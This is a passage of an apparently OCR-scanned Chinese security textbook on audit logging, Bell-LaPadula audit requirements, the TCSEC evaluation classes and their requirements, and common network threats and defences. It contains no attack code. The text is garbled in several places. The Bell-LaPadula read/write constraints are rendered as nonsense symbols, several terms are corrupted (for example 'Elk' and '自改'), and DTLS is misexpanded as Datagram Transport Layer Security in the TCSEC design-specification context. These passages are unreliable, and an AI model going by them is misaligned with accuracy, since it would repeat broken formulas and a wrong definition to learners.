并 检查 对 于 系统 及 文件 的 未 授权 访问 。 这 些 工作 的 前 提 是 日 志 机 制 ， 在 日 志 中 记录 许多 额外 
信息 。 

日 志 就 是 记录 的 事件 或 统计 数据 ， 这 些 事件 或 者 统计 数据 能 够 提供 关于 系统 使 用 及 性 能 
方面 的 信息 。 审 计 就 是 对 日 志 记录 的 分 析 并 以 清晰 、 易 于 理解 的 方式 表述 系统 信息 。 

日 志 提供 了 一 种 安全 机 制 ， 它 能 分 析 系统 的 安全 状态 ， 能 判断 某 个 请 求 的 行为 是 否 会 使 
系统 处 于 不 安全 状态 ， 或 判断 一 个 事件 序列 是 否 会 导致 系统 处 于 不 安全 (或 危及 安全 ) 状 态 。 
例如 ， 日 志 记录 了 所 有 引起 状态 转变 的 事件 ， 系 统 就 能 在 任何 时 候 重建 系统 状态 。 或 者 只 要 
记录 了 这 些 信息 的 一 个 子 集 ， 就 能 够 消除 引起 安全 问题 的 某 些 可 能 因素 ， 也 能 为 进一步 分 析 
提供 有 用 的 基础 。 

审计 机 制 必须 记录 权限 的 使 用 情况 ， 有 了 这 些 记录 和 分 析 ， 审 计 机 制 能 够 阻止 攻击 ， 因 
此 能 确保 检测 到 任何 对 安全 策略 的 破坏 。 那 么 ， 日 志 应 该 记录 哪些 信息 ? 审计 哪些 信息 ? 这 
是 两 个 相互 联系 的 问题 。 要 决定 哪些 事件 和 行为 应 该 被 审计 ， 就 需要 知道 系统 安全 方案 相关 
的 知识 ， 知 道 哪些 尝试 入 侵 是 安全 方案 所 允许 的 ， 知 道 如 何 检测 这 些 尝试 。 于 是 必须 知道 日 
志 需 要 记录 哪些 信息 ， 入 侵 者 一 定 会 使 用 哪些 命令 来 尝试 入 侵 ， 入 侵 者 一 定 会 产生 哪些 系统 
呼叫 ， 他 们 会 用 何 种 顺序 发 出 这 些 命令 和 系统 呼叫 等 。 所 有 事件 的 日 志 提供 了 这 些 信息 ， 问 
题 是 如 何 辨别 信息 的 哪些 部 分 是 相关 的 ， 确 定 需 要 审计 的 关键 问题 。 

一 个 审计 系统 包含 三 个 部 分 : 日 志 记 录 器 、 分 析 器 和 通告 器 ， 它 们 分 别 用 于 收集 数据 、 
分 析 数 据 和 通报 结果 。 

审计 机 制 的 分 析 建 立 在 日 志 系 统 所 记录 的 数据 的 基础 上 ， 并 且 这 个 机 制 分 析 关 于 系统 安 
全 状态 的 相关 信息 ， 决 定 是 否 发 生 了 特定 系统 行为 或 者 是 否 进入 某 种 特定 状态 。 

审计 的 目标 决定 日 志 记录 哪些 信息 。 一 般 地 ， 审 计 员 希望 检测 到 违反 安全 策略 的 行为 。 
假设 Ai 是 一 个 系统 中 可 能 行为 的 集合 ， 安 全 策略 提供 了 约束 Pi。 为 保证 系统 安全 ， 设 计 必 
须 满足 约束 Pi， 也 就 是 说 必须 审计 那些 使 约束 失败 的 功能 调用 。 

例如 ，Bell-LaPadula 策略 模型 将 安全 等 级 Li 线性 排列 。 主 体 s 有 等 级 L(s)， 客体 o 有 等 
级 L(0)。 在 这 个 策略 下 ， 当 L(0) 三 L(s) 时 ，s 读 取 o， 或 者 当 L(s)>L(0) 时 ，s 写 o 是 非法 的 。 
相应 的 约束 就 是 : s 读 o HEH LOLO), s *3 o 推出 L(s)L(o)- 

违反 安全 策略 的 审计 仅仅 要 求 审计 从 一 个 主体 到 一 个 低级 客体 的 写 ， 或 者 从 一 个 高 级 客 
体 的 读 ， 并 检查 违反 这 些 约束 的 行为 。 日 志 必 须 包 括 涉及 主体 和 客体 的 安全 等 级 、 行 为 和 结 
果 。 从 这 些 日 志 记录 可 以 非常 容易 地 测试 是 否 有 违反 约束 的 行为 。 这 里 并 不 需要 记录 客体 和 
主体 的 名 字 。 但 在 实际 情况 中 ， 本 地 安全 策略 常 要 求 安 全 分 析 员 标识 出 违反 约束 的 客体 和 试 
图 违反 约束 的 用 户 。 如 果 没有 静态 原则 ， 主 体 可 以 把 它 控制 的 任何 主体 、 客 体 的 安全 级 别 或 
分 类 改变 成 不 比 它 自己 高 的 级 别 。 因 此 需要 记录 操作 命令 、 新 旧 安 全 等 级 和 新 旧 分 类 。 
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从 这 个 例子 可 以 得 出 ， 基 于 Bell-LaPadula 系统 的 审计 需要 记录 以 下 内 容 : 对 于 读 和 写 ， 
需要 记录 主体 的 安全 等 级 、 客 体 的 安全 等 级 和 操作 的 结果 ; 对 于 无 静态 原则 的 系统 ， 需 要 记 
录 主体 或 客体 ， 及 其 新 旧 安 全 等 级 、 改 变 安全 等 级 的 主体 的 安全 等 级 和 改变 结果 。 

如 果 审 计 结果 表明 有 违反 安全 规则 的 行为 ， 则 系统 是 不 安全 的 。 但 是 ， 如 果 审 计 结 果 表 
明 没 有 违反 安全 规则 的 行为 ， 则 系统 仍 可 能 是 不 安全 的 。 因 为 ， 如 果 系 统 的 初始 状态 是 不 安 
全 的 ， 结 果 将 是 (或 者 很 可 能 是 ) 不 安全 的 。 因 此 ， 如 果 用 审计 来 检测 系统 是 否 安全 ， 而 不 是 
检测 攻击 入 侵 的 操作 ， 就 还 需要 获取 系统 的 初始 状态 ， 需 要 一 开始 就 将 系统 状态 转换 中 会 改 
变 的 信息 记录 到 日 志 。 

有 一 个 关键 的 问题 是 如 何 来 操作 日 志 。 比 如 ， 哪 种 数据 应 该 放 入 日 志文 件 中 ， 数 据 该 如 

何 表 述 。 但 是 现实 中 ， 许 多 系统 日 志 数据 模糊 不 清 使 得 不 能 清晰 地 说 明日 志 记录 所 记录 的 内 
容 ， 所 以 使 用 基于 语法 的 方式 来 定义 日 志 内 容 。 比 如 使 用 BNF 的 表达 方式 ， 使 设计 者 必须 定 
义 日 志 内 容 的 语法 和 语义 ， 这 样 分 析 员 就 能 使 用 语法 来 分 析 日 志 记录 。 
当 检测 出 所 有 可 能 的 违反 安全 规则 行为 时 ， 并 不 代表 能 够 设计 出 有 效 的 审计 系统 。 许 多 
违反 安全 的 行为 是 在 已 有 系统 上 出 现 的 ， 这 些 系统 在 设计 时 并 没有 考虑 安全 因素 。 此 时 ， 审 
计 可 能 有 两 个 不 同 目标 ， 第 一 个 目标 是 检测 对 某 个 安全 策略 的 任何 攻击 ， 此 目标 着 重 安全 策 
略 。 基 本 思路 是 判定 某 个 状态 是 否 违反 了 安全 策略 。 审 计 机 制 必须 结合 到 已 存在 的 系统 中 。 
分 析 员 必须 分 析 系 统 ， 判 定 什么 操作 和 设置 与 安全 策略 一 致 。 然 后 设计 某 种 机 制 来 检查 操作 
和 设置 是 否 真正 与 策略 一 致 。 第 二 个 目标 是 检测 已 知 的 企图 违反 安全 规则 的 操作 ， 此 目标 注 
重 特殊 行为 。 许 多 情况 下 ， 安 全 策略 并 没有 明确 地 定义 ， 然 而 ， 某 些 行为 明显 是 不 安全 的 ， 
如 泛 洪 攻击 或 未 授权 的 用 户 访问 计算 机 系统 ， 会 违反 潜在 的 安全 策略 。 此 时 ， 分 析 员 可 通过 
命令 的 特定 次 序 或 系统 状态 的 特征 来 寻找 并 发 现 针对 安全 的 攻击 。 

不 同系 统 采 用 不 同方 式 处 理 日 志 。 许 多 系统 默认 情况 下 是 记录 所 有 事件 。 对 于 不 需要 记 
录 的 特定 事件 ， 系 统管 理 员 要 进行 显 式 指定 ， 这 就 会 带 来 日 志 膨胀 问题 。 

对 于 设计 时 考虑 安全 的 系统 ， 将 把 审计 机 制 结合 到 系统 的 设计 和 实现 中 。 典 型 的 做 法 是 
提供 某 种 语言 或 界面 ， 以 允许 系统 管理 员 配 置 系统 来 报告 特定 事件 ， 监 控 特 定 主题 或 监控 对 
特定 客体 的 访问 。 

对 于 设计 时 没有 考虑 安全 的 系统 ， 其 审计 系统 能 用 于 检查 出 严重 的 安全 攻击 行为 ， 但 一 
般 不 记录 事件 的 某 些 细节 或 事件 类 型 , 以 使 安全 管理 员 难 以 判定 是 否 有 违反 安全 规则 的 行为 。 


24.3 ”系统 评估 


系统 评估 是 一 种 以 具体 的 安全 功能 要 求 和 安全 保障 证 据 为 基础 ， 对 系统 进行 可 信 度 测量 
的 技术 。 通 过 评估 ， 可 指出 系统 满足 具体 标准 的 程度 。 评 估 时 所 采用 的 标准 依赖 于 评估 的 目 
标 以 及 所 采用 的 评估 方法 。 可 信 计 算 机 系统 评估 标准 (TCSEC, Trusted Computer System 
Evaluation Criteria) 是 第 一 个 被 广泛 使 用 的 形式 化 评估 方法 , 随后 的 评估 方法 都 建立 在 TCSEC 
的 基础 之 上 ， 或 是 对 TCSEC 的 改进 。 

TCSEC 标准 是 计算 机 系统 安全 评估 的 第 一 个 正式 标准 ， 具 有 划时代 的 意义 。 该 准则 于 
1970 年 由 美国 国防 科学 委员 会 提出 ， 并 于 1985 年 12 月 由 美国 国防 部 公布 。TCSEC 最 初 只 
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是 军用 标准 ， 后 来 扩展 至 民用 领域 。TCSEC 是 按照 评估 等 级 来 组 织 的 ,在 各 个 评估 等 级 的 描 
述 中 定义 了 功能 需求 和 安全 保障 需求 。 

TCSEC 将 计算 机 系统 的 安全 划分 为 4 个 等 级 、7 个 级 别 。 每 个 等 级 都 包含 了 相应 的 功 
能 需求 和 安全 保障 需求 。 随 着 评估 级 别 的 提高 ， 功 能 需求 和 安全 保障 需求 都 会 不 断 地 增加 
和 提高 。 

DD 类 安全 等 级 : D 类 安全 等 级 只 包括 D1 一 个 级 别 。D1 的 安全 等 级 最 低 ， 只 为 文件 和 上 
户 提供 安全 保护 。D1 系统 最 普通 的 形式 是 本 地 操作 系统 ， 或 者 是 一 个 完全 没有 保护 的 网 络 。 

C 类 安全 等 级 C 类 安全 等 级 能 够 提供 审慎 的 保护 ， 并 为 用 户 的 行动 和 责任 提供 审计 能 
Jj. C 类 安全 等 级 可 划分 为 Cl1 和 C2 两 类 。C1 称 为 自主 保护 。C1 系统 的 可 信任 运算 基础 体 
制 (TCB, Trusted Computing Base) 通 过 将 用 户 和 数据 分 开 来 达到 安全 的 目的 。 在 C1 系统 中 ， 
所 有 用 户 以 同样 的 灵敏 度 来 处 理 数 据 ， 即 用 户 认为 C1 系统 中 的 所 有 文档 都 具有 相同 的 机 密 
性 。C2 称 为 受 控 访 问 保护 。C2 系统 比 CY 系统 加 强 了 可 调 的 审慎 控制 。 在 连接 到 网 络 上 时 ， 
C2 系统 的 用 户 分 别 对 各 自 的 行为 负责 。C2 系统 通过 登录 过 程 、 安 全 事件 和 资源 隔离 来 增强 
这 种 控制 。C2 系统 具有 C1 系统 中 所 有 的 安全 性 特征 。 

B 类 安全 等 级 : B 类 安全 等 级 可 分 为 Bl1、 B2 和 B3 三 类 。B 类 系统 具有 强制 性 保护 功能 。 
强制 性 保护 意味 着 如 果 用 户 没 有 与 安全 等 级 相连 ,系统 就 不 会 让 用 户 存 取 对 象 。 Bl 称 为 标签 
安全 保护 。B1 系统 满足 下 列 要 求 : 系统 对 网 络 控制 下 的 每 个 对 象 都 进行 灵敏 度 标记 ; 系统 使 
用 灵敏 度 标记 作为 所 有 强迫 访问 控制 的 基础 ; 系统 在 把 导入 的 、 非 标记 的 对 象 放 入 系统 前 标 
记 它 们 ; 灵敏 度 标记 必 须 准确 表示 其 所 联系 的 对 象 的 安全 级 别 ， 当 系统 管理 员 创建 系统 或 者 
增加 新 的 通信 通道 或 IO 设备 时 , 管理 员 必 须 指定 每 个 通信 通道 和 1/O 设备 是 单 级 还 是 多 级 ， 
并 且 管理 员 只 能 手工 改变 指定 ; 单 级 设备 并 不 保持 传输 信息 的 灵敏 度 级 别 ， 所 有 直接 面向 用 
户 位 置 的 输出 (无 论 是 虚拟 的 还 是 物理 的 ) 都 必须 产生 标记 来 指示 关于 输出 对 象 的 灵敏 度 ， 系 
统 必须 使 用 用 户 的 口令 或 证 明 来 决定 用 户 的 安全 访问 级 别 ， 系 统 必须 通过 审计 来 记录 未 授权 
访问 的 企图 。 

B2 称 为 结构 化 保护 。B2 系统 必须 满足 Bl 系统 的 所 有 要 求 。 另 外 ，B2 系统 的 管理 员 必 
须 使 用 一 个 明确 的 、 文 档 化 的 安全 策略 模式 作为 系统 的 可 信任 运算 基础 体制 。B2 系统 必须 满 
足下 列 要 求 : 系统 必须 立即 通知 系统 中 的 每 一 个 用 户 所 有 与 其 相关 的 网 络 连接 的 改变 ; 只 有 
用 户 能 在 可 信任 通信 路 径 中 进行 初始 化 通信 ; 可 信任 运算 基础 体制 能 够 支持 独立 的 操作 者 和 
管理 员 。 

B3 称 为 安全 域 。B3 系统 必须 符合 B2 系统 的 所 有 安全 需求 。B3 系统 具有 很 强 的 监视 委 
托管 理 访问 能 力 和 抗 干扰 能 力 。B3 系统 必须 设 有 安全 管理 员 。B3 系统 应 满足 以 下 要 求 : 除 
了 控制 对 个 别 对 象 的 访问 外 ,，B3 必须 产生 一 个 可 读 的 安全 列表 ; 每 个 被 命名 的 对 象 提供 对 该 
对 象 没有 访问 权 的 用 户 列表 说 明 ; B3 系统 在 进行 任何 操作 前 ， 要 求 用 户 进行 身份 验证 ，B3 
系统 验证 每 个 用 户 ， 还 会 发 送 一 个 取消 访问 的 审计 跟踪 消息 ， 设 计 者 必须 正确 区 分 可 信任 的 
通信 路 径 和 其 他 路 径 ， 可 信任 的 通信 基础 体制 为 每 个 被 命名 的 对 象 建立 安全 审计 跟踪 ， 可 信 
任 的 运算 基础 体制 支持 独立 的 安全 管理 。 

人 A 类 安全 等 级 : A 系统 的 安全 级 别 最 高 。 目 前 ，A 类 安全 等 级 只 包含 Al 一 个 安全 类 别 ， 
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称 为 验证 保护 。Al 类 与 B3 类 相似 ， 对 系统 的 结构 和 策略 不 做 特别 要 求 。Al 系统 的 显著 特 
征 是 ， 系 统 的 设计 者 必须 按 一 个 正式 的 设计 规范 来 分 析 系统 。 对 系统 分 析 后 ， 设 计 者 必须 运 
用 核对 技术 来 确保 系统 符合 设计 规范 。Al 系统 必须 满足 下 列 要 求 : 系统 管理 员 必 须 从 开发 者 
那里 接收 到 一 个 安全 策略 的 正式 模型 ， 所 有 安装 操作 都 必须 由 系统 管理 员 进 行 ， 系 统管 理 员 
执行 的 每 一 步 安装 操作 都 必须 有 正式 文档 。 

1. TCSEC 的 安全 功能 需求 


身份 识别 和 认证 需求 详细 说 明了 系统 是 如 何 标识 用 户 的 身份 ， 以 及 认证 该 用 户 的 身份 。 
同时 还 处 理 认证 数据 的 粒度 (每 一 组 或 每 一 个 用 户 等 )、 认 证 数据 的 保护 以 及 与 审计 相关 的 身 
份 标识 问题 。 

自主 访问 控制 需求 确定 了 一 种 访问 控制 机 制 ， 访 问 控制 的 权限 由 访问 对 象 的 拥有 者 来 自 
主 决定 ， 也 可 由 被 授权 控制 对 象 访问 的 人 来 决定 。 拥 有 者 能 够 决定 谁 应 该 拥有 对 其 对 象 的 访 
问 权 及 内 容 。 自 主 访问 控制 的 实现 可 以 基于 主体 或 者 客体 来 进行 。 

强制 访问 控制 需求 在 低 于 Bl 级 的 评估 等 级 中 并 不 要 求 ， 个 人 用 户 不 能 改变 这 种 控制 。 
强制 访问 控制 往往 根据 一 个 具体 的 安全 模型 ， 通 过 预 设 的 规则 来 进行 。 标 记 是 强制 访问 控制 
的 基础 ， 标 记 可 以 与 主体 和 客体 绑 定 在 一 起 的 方式 存在 ， 也 可 以 存放 在 数据 表 中 ， 使 用 时 根 
据 主体 和 客体 的 特征 字段 进行 查找 。 

审计 需求 要 求 系统 中 存在 一 种 审计 机 制 并 保护 审计 数据 。 该 需求 定义 了 审计 记录 必须 包 
含 的 内 容 以 及 审计 机 制 必须 记录 的 事件 。 随 着 评估 级 别 的 提高 ， 审 计 需 求 不 断 扩展 。 

TCSEC 还 提出 其 他 一 些 需 求 , 如 客体 重用 需求 和 可 信 路 径 需 求 。 客体 重用 需求 主要 是 为 
了 防止 攻击 者 从 可 重用 客体 中 收集 信息 ， 比 如 从 内 存 和 磁盘 中 获取 信息 。 该 需求 要 求 在 释放 
一 个 可 重用 客体 时 ， 要 撤消 前 一 个 用 户 对 该 客体 的 访问 权限 ， 并 阻止 新 用 户 读 取 前 一 个 用 户 
留 在 该 客体 中 的 信息 。 可 信 路 径 需 求 提供 一 条 保证 在 用 户 和 TCB 之 问 通信 的 路 径 。 

2. TCSEC 的 安全 保障 需求 


配置 管理 需求 要 求 验证 所 有 的 配置 项 ， 验 证 所 有 的 文档 和 代码 之 间 的 一 致 性 ， 以 及 验证 
用 于 生成 TCB 的 工具 。 该 需求 只 对 等 于 或 者 高 于 B2 的 评估 等 级 进行 要 求 。 

可 信 软 件 发 布 需求 要 求 保证 软件 原版 和 在 线 版 本 之 间 的 一 致 性 和 完整 性 ， 并 保证 用 户 的 
接收 过 程 是 安全 的 。 该 需求 只 针对 Al 评估 等 级 。 

系统 体系 结构 需求 要 求 系统 模块 化 、 复 杂 性 最 小 化 等 。 目 标 是 使 TCB 尽 可 能 简短 。 该 
需求 只 对 Cl 和 了 B3 之 间 的 评估 等 级 进行 要 求 。 

设计 规范 和 验证 需求 在 不 同 的 评估 等 级 中 差别 很 大 。 评 估 等 级 C1 和 C2 没有 此 要 求 。 
B1 需要 一 个 非 形式 化 的 、 与 相关 公理 一 致 的 安全 策略 模型 ; B2 需要 一 个 形式 化 的 安全 模型 ， 
该 模型 与 相关 公理 的 一 致 性 必须 是 可 证 明 的 ， 并 且 系 统 具 有 一 个 描述 性 的 高 层 规范 
DTLS(Datagram Transport Layer Security; B3 进一步 要 求 说 明 DTLS 和 安全 策略 模型 之 间 的 
一 致 性 。 

测试 需求 要 求 测试 结果 和 目标 一 致 ， 系 统 能 抵御 攻击 并 在 修正 系统 漏洞 后 再 重新 测试 。 
在 高 等 级 评估 中 ， 还 要 求 采 用 形式 化 方法 搜索 通道 。 
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产品 文档 需求 在 所 有 的 评估 等 级 中 都 要 求 存在 。 该 需求 分 为 安全 特征 用 户 指南 和 可 信 设 
施 手 册 。 安 全 特征 用 户 指南 需求 要 求 描述 保护 机 制 ， 各 种 机 制 之 间 如 何 交 互 ， 以 及 如 何 使 
j 这 些 保 护 机 制 ， 可 信 设 施 手 册 需 求 要 求 描述 产品 安全 运行 的 需求 ， 包 括 生成 、 启 动 和 其 
他 规程 。 

3. TCSEC 的 评估 过 程 


评估 分 为 三 个 阶段 : 申请 、 初 步 技术 审查 PTR、 评 估 。 评估 由 政府 资助 的 评估 单位 进行 。 

如 果 政 府 不 需要 一 个 产品 ， 该 产品 的 评估 申请 将 被 拒绝 。 否 则 进行 下 一 步 PTR: 详细 讨论 评 

估 过 程 、 评 估 进 度 、 开 发 过 程 、 产 品 技术 内 容 和 需求 等 ， 然 后 决定 何 时 派 遗 评估 工作 组 以 及 

具体 的 评估 进度 表 。 这 个 过 程 实际 上 是 为 评估 做 的 准备 工作 。 到 评估 阶段 ， 又 可 以 细 分 为 三 

个 小 阶段 : 设计 分 析 、 测 试 分 析 、 最 终 评论 。 在 每 个 小 阶段 的 评估 结果 都 必须 提交 技术 审查 
员 会 TRB 进行 审查 ， 只 有 评估 的 结果 得 到 认可 才能 进行 下 一 个 阶段 的 评估 。 


2.5 “计算 机 网 络 安全 


2.5.1 计算 机 网 络 安全 概述 


计算 机 网 络 ， 是 指 将 地 理 位 置 不 同 的 具有 独立 功能 的 多 台 计 算 机 及 其 外 部 设备 ， 通 过 通 
信 线 路 连接 起 来 ， 在 网 络 操作 系统 ， 网 络 管理 软件 及 网 络 通信 协议 的 管理 和 协调 下 ， 实 现 资 
源 共享 和 信息 传递 的 计算 机 系统 。 

随 着 计算 机 网 络 的 迅速 发 展 ， 互 联网 应 用 已 经 涉及 政府 、 军 事 、 经济 、 文 教 等 诸多 领域 。 
在 这 些 领 域 中 包含 了 大 量 的 信息 ， 其 中 不 乏 涉 及 个 人 信息 、 国 家 机 密 等 敏感 信息 。 由 于 计算 
机 网 络 组 成 形式 多 样 性 、 终 端 分 布 广 和 网 络 的 开放 性 、 互 联 性 等 特征 ， 致 使 这 些 存储 在 网 络 
上 的 信息 容易 受到 来 自 世 界 各 地 的 人 为 攻击 。 为 了 保护 这 些 信息 就 必须 要 有 一 套 完善 的 网 络 
安全 保护 机 制 。 为 了 解决 这 个 问题 ， 要 搞 清楚 几 个 概念 ， 什 么 是 计算 机 安全 ? 当前 的 网 络 安 
全 的 现状 是 什么 ? 我 们 采取 什么 措施 来 解决 这 些 网 路 安全 问题 ? 

首先 ， 根 据 国际 标准 化 组 织 的 定义 ， 计 算 机 网 络 安全 是 指 : 为 数据 处 理 系统 建立 和 采取 
的 技术 和 管理 的 安全 保护 ， 保 护 网 络 系统 的 硬件 、 软 件 及 其 系统 中 的 数据 不 因 偶然 的 或 者 恶 
意 的 原因 遭受 到 破坏 、 更 改 、 汇 露 ， 系 统 连 续 可 靠 、 正 常 地 运行 ， 网 络 服务 不 中 断 。 

然后 ， 我 们 要 知道 计算 机 网 络 安全 是 一 项 复杂 的 系统 工程 ， 涉 及 技术 、 设 备 、 管 理 和 制 
度 等 多 方面 的 因素 ， 安 全 解决 方案 的 制定 需要 从 整体 上 进行 把 握 。 网 络 安全 解决 方案 是 综合 
各 种 计算 机 网 络 信息 系统 安全 技术 ， 将 安全 操作 系统 技术 、 防 火 墙 技术 、 病 毒 防护 技术 、 入 
侵 检测 技术 、 安 全 扫描 技术 等 综合 起 来 ， 形 成 一 套 完整 的 、 协 调 一 致 的 网 络 安全 防护 体系 。 

计算 机 网 络 安全 的 定义 包含 了 物理 安全 和 风 辑 安全 两 方面 的 内 容 。 其 中 ， 逻 辑 安全 就 是 
我 们 常 说 的 网 络 信息 安全 。 因 此 ， 网 络 安全 的 相关 技术 和 理论 应 具备 以 下 五 个 特征 : 

1) 保密 性 :信息 不 泄露 给 非 授权 用 户 、 实 体 或 过 程 ， 或 供 其 利用 的 特性 。 

2) 完整 性 : 数据 未 经 授权 不 能 进行 修改 的 特性 。 即 信息 在 存储 或 传输 过 程 中 保持 不 被 修 
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3) 可 用 性 : 可 被 授权 实体 访问 并 按 需 求 使 用 的 特性 。 即 当 需 要 时 能 否 存 取 所 需 的 信息 。 
例如 ， 网 络 环境 下 拒绝 服务 、 破 坏 网 络 和 有 关系 统 的 正常 运行 等 都 属于 对 可 用 性 的 攻击 。 

4) 可 控 性 ， 对 信息 的 传播 及 内 容 具 有 控制 能 力 。 

5 可 审查 性 ， 出 现 安全 问题 时 提供 依据 与 手段 

计算 机 网 络 安全 的 具体 含义 会 随 着 “角度 ”的 不 同 而 发 生变 化 。 例 如 ， 从 用 户 的 角度 ， 
他 们 希望 涉及 个 人 和 商业 的 信息 在 网 络 上 传输 时 受到 机 密 性 、 完 整 性 和 真实 性 的 保护 ， 避 免 
其 他 人 或 对 手 利 用 窃听 、 冒 充 、 算 改 、 抵 赖 等 手段 对 自己 的 利益 和 隐私 造成 损害 和 侵犯 ， 从 
网 络 运营 商 和 管理 者 的 角度 , 他 们 希望 对 本 地 网 络 信息 的 访问 、 读 写 等 操作 受到 保护 和 控制 ， 
避免 出 现 病毒 、 非 法 存 取 、 拒 绝 服务 和 网 络 资源 的 非法 占用 和 非法 控制 等 威胁 ， 制 止 和 防御 
网 络 “ 黑 客 ” 的 攻击 ， 从 安全 保密 部 门 的 角度 ， 他 们 希望 对 非法 的 、 有 害 的 或 涉及 国家 机 密 
的 信息 进行 过 滤 和 防 堵 ， 避免 机 要 信息 被 泄露 ,避免 对 社会 产生 危害 ,对 国家 造成 巨大 损失 。 

随 着 计算 机 和 通信 技术 的 发 展 ， 网 络 信息 的 安全 和 保密 已 成 为 一 个 至 关 重要 且 急 需 解 决 
的 问题 。 计 算 机 网 络 所 具有 的 开放 性 、 互 连 性 和 共享 性 等 特征 使 网 上 信息 安全 存在 着 先天 
不 足 ， 再 加 上 系统 软件 中 的 安全 漏洞 以 及 所 欠缺 的 严格 管理 ， 致 使 网 络 易 受 攻击 ， 因 此 网 
络 安全 所 采取 的 措施 应 能 全 方位 地 针对 各 种 不 同 的 威胁 。 目 前 面临 的 计算 机 网 络 安全 威胁 
主要 包括 : 

1) 信息 泄露 ， 是 指 信 息 被 泄露 给 非 授权 的 实体 。 如 ， 钓 鱼网 站 、 病 毒 、 软 件 漏洞 等 。 

2) 拒绝 服务 式 攻 击 : 是 一 种 恶意 的 网 络 攻击 手法 , 其 目的 在 于 使 连接 上 网 络 的 目标 电脑 


的 网 络 资源 及 系统 资源 耗 尽 ， 使 这 个 连 上 网 络 的 主机 暂时 中 断 或 停止 服务 ， 使 它 无 法 对 正常 
用 户 提供 服务 。 


3) 网 络 滥用 : 合法 的 用 户 滥用 网 络 , 引入 不 必要 的 安全 威胁 , 包括 非法 外 联 、 非法 内 联 、 
移动 风险 、 设 备 滥用 、 服 务 滥用 。 

上 述 几 种 计算 机 网 络 威胁 的 具体 表现 形式 ， 常 见 的 为 : 

1) 窃听 : 攻击 者 通过 监视 网 络 数据 的 手段 获得 重要 的 信息 ， 从 而 导致 信息 的 泄露 。 

2) Elk: 攻击 者 事先 获得 全 部 或 部 分 信息 ， 然 后 将 这 些 信息 发 送 给 接收 者 。 

3) 自 改 : 攻击 者 对 合法 用 户 之 间 的 通信 信息 进行 修改 、 删 除 、 插 入 ， 然 后 再 将 伪造 的 信 
息 发 送 给 接收 者 。 

4) 行为 否认 ; 通讯 实体 否认 已 发 生 的 行为 。 

5) 非 授权 访问 :未 经 授权 就 使 用 网 络 或 计算 机 资源 。 

6) 病毒 传播 : 通过 计算 机 网 络 传播 病毒 。 其 破坏 性 高 ， 而 且 也 会 难以 防范 。 

实现 上 述 威 胁 的 具体 攻击 方式 又 分 为 : 

1) 主动 攻击 : 是 指 攻击 者 对 传输 中 的 信息 或 存储 的 信息 进行 各 种 非法 处 理 ， 有 选择 地 更 
改 、 插 入 、 延 迟 、 删 除 或 复制 这 些 信 息 。 主 动 攻击 常用 的 方法 有 : 自 改 程序 及 数据 、 假 冒 合 
法 用 户 入 侵 系 统 、 破 坏 软件 和 数据 、 中 断 系统 正常 运行 、 传 播 计算 机 病毒 、 耗 尽 系统 的 服务 
资源 而 造成 拒绝 服务 等 。 主 动 攻击 的 破坏 力 更 大 ， 它 直接 威胁 网 络 系统 的 可 靠 性 、 信 息 的 保 
密 性 、 完 整 性 和 可 用 性 。 
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2) 被 动 攻击 : 是 指 攻击 者 只 通过 监听 网 络 线路 上 的 信息 流 而 获得 信息 内 容 , 或 获得 信息 
的 长 度 、 传 输 频率 等 特征 ， 以 便 进 行 信息 流量 分 析 攻 击 。 被 动 攻击 不 干扰 信息 的 正常 流动 ， 
如 被 动 地 搭 线 窃听 或 非 授权 地 阅读 信息 。 被 动 攻击 破坏 了 信息 的 保密 性 。 

主动 攻击 较 容易 被 检测 到 ， 但 却 难以 防范 。 因 为 正常 传输 的 信息 被 算 改 或 被 伪造 ， 接 收 
方 根据 经 验 和 规律 能 容易 地 觉察 出 来 。 除 采用 加 密 技术 外 ， 还 要 采用 鉴别 技术 和 其 他 保护 机 
制 和 措施 ， 才 能 有 效 地 防止 主动 攻击 。 被 动 攻击 不 容易 被 检测 到 ， 因 为 它 没有 影响 信息 的 正 
常 传输 ， 发 送 和 接受 双方 均 不 容易 觉察 。 但 被 动 攻击 却 容易 防止 ， 只 要 采用 加 密 技 术 将 传输 
的 信息 加 密 ， 即 使 该 信息 被 窃取 ， 非 法 接收 者 也 不 能 识别 信息 的 内 容 。 

为 了 应 对 日 益 严重 的 计算 机 网 络 安全 威胁 ， 业 界 提出 了 很 多 解决 方案 ， 其 中 常见 的 技术 
包括 : 

1) 防 病毒 技术 : 网 络 中 的 系统 可 能 会 受到 多 种 病毒 威胁 , 对 于 此 可 以 采用 多 层 的 病毒 防 
卫 体 系 。 即 在 每 台 计 算 机 、 每 台 服 务 器 以 及 网 关上 安装 相关 的 防 病毒 软件 。 由 于 病毒 在 网 络 
中 存储 、 传 播 、 感 染 的 方式 各 异 且 途径 多 种 多 样 ， 故 相应 地 在 构建 网 络 防 病毒 系统 时 ， 应 用 
全 方位 的 企业 防毒 产品 ， 实 施 层 层 设防 、 集 中 控制 、 以 防 为 主 、 防 杀 结 合 的 策略 。 

2) 防火 墙 技术 : 防火 墙 技术 是 近年 发 展 起 来 的 重要 网 络 安全 技术 , 其 主要 作用 是 在 网 络 
入 口 处 检查 网 络 通信 ， 根 据 用 户 设 定 的 安全 规则 ， 在 保护 内 部 网 络 安全 的 前 提 下 ， 保 障 内 外 
网 络 通信 ， 提 高 内 部 网 络 的 安全 。 

3) 入 侵 检测 技术 : 入 侵 检测 系统 是 近年 出 现 的 新 型 网 络 安全 技术 , 目的 是 提供 实时 的 入 
侵 检 测 及 采取 相应 的 防护 手段 。 实 时 入 侵 检测 能 力 之 所 以 重要 ， 是 因为 它 能 够 同时 对 付 来 自 
内 外 网 络 的 攻击 。 

4) 安全 扫描 技术 : 这 是 又 一 类 重要 的 网 络 安全 技术 。 安 全 扫描 技术 与 防火 墙 、 入 侵 检 测 
系统 互相 配合 ， 能 够 有 效 提高 网 络 的 安全 性 。 通 过 对 网 络 的 扫描 ， 可 以 了 解 网 络 的 安全 配置 
和 运行 的 应 用 服务 ， 及 时 发 现 安全 漏洞 ， 客 观 评估 网 络 风险 等 级 。 如 果 说 防火 墙 和 网 络 监控 
系统 是 被 动 的 防御 手段 ， 那 么 安全 扫描 就 是 一 种 主动 的 防范 措施 ， 做 到 防 患 于 未 然 。 

5) 网 络 安全 紧急 响应 体系 : 网 络 安全 作为 一 项 动态 工程 , 意味 着 它 的 安全 程度 会 随 着 时 
间 的 变化 而 发 生变 化 。 随 着 时 间 和 网 络 环境 的 变化 或 技术 的 发 展 而 不 断 调整 自 身 的 安全 策略 ， 
并 及 时 组 建 网 络 安全 紧急 响应 体系 ， 专 人 负责 ， 防 范 安全 突 发 事件 。 

